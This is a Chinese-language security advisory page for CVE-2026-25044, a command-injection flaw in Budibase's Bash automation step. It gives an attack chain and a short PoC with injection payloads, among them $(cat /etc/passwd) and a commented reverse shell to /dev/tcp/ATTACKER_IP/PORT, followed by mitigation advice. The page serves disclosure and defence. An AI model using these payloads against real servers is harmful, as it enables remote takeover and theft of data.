CVE-2026-25044 CVSS 8.8 高危

CVE-2026-25044 Budibase 远程代码执行漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-25044

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Budibase

漏洞概述

Budibase是一个开源低代码平台。在3.33.4版本之前，其bash自动化步骤存在严重安全缺陷。系统在处理用户提供的命令时，通过processStringSync函数进行模板插值处理，随后调用execSync执行。由于缺乏适当的输入清理和验证机制，攻击者可利用该漏洞构造恶意命令字符串。一旦被利用，攻击者可在服务器端执行任意系统命令，获取系统控制权，对数据机密性、完整性和可用性造成严重影响。

技术细节

该漏洞根因在于Budibase处理自动化任务时的不安全代码执行机制。具体而言，当用户配置Bash自动化步骤时，系统接收的用户输入会直接传递给processStringSync函数。该函数支持模板插值功能，允许解析特定语法，意图是动态生成命令。然而，由于系统缺乏有效的安全清洗机制，未能区分合法的模板变量与恶意的Shell操作符。攻击者可以注入恶意的Shell命令（例如使用`$()`语法或反引号）来绕过逻辑。随后，系统调用execSync执行经过插值处理的字符串，导致恶意命令在服务器运行时上下文中被运行。结合CVSS向量分析，攻击者仅需低权限且无需用户交互即可通过网络发起攻击。成功利用该漏洞可导致攻击者在服务器上执行任意代码，窃取敏感数据、安装后门或破坏服务，从而对系统的机密性、完整性和可用性造成全面且不可逆的影响。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统为Budibase实例，并确定版本低于3.33.4。

STEP 2

2. 获取访问

攻击者使用低权限账户登录Budibase平台（CVSS PR:L）。

STEP 3

3. 构造Payload

攻击者准备利用Bash模板插值特性的恶意Shell命令，如$(cat /etc/passwd)。

STEP 4

4. 注入漏洞

攻击者在自动化流程中创建或编辑Bash自动化步骤，将恶意Payload填入命令输入框。

STEP 5

5. 执行攻击

触发自动化流程执行，后端通过execSync执行恶意命令，实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC Concept for CVE-2026-25044
// Target: Budibase Bash Automation Step
// Description: Injecting a command using template interpolation syntax.

// The vulnerable function processStringSync allows inputs like:
const malicious_payload = "$(whoami)";

// When this payload is placed in the Bash automation command field,
// the backend executes it via execSync without sanitization.
// Result: The system executes 'whoami' and returns the current user.

// Example of a reverse shell payload (if environment allows):
// const reverse_shell = "$(bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1)";

console.log("Payload to inject: " + malicious_payload);

影响范围

Budibase < 3.33.4

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应暂时禁用Bash自动化步骤功能，或通过网络策略严格限制服务器对外部命令的执行权限，并对进入自动化步骤的输入进行严格的WAF过滤，拦截包含特殊字符（如$、`、;等）的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表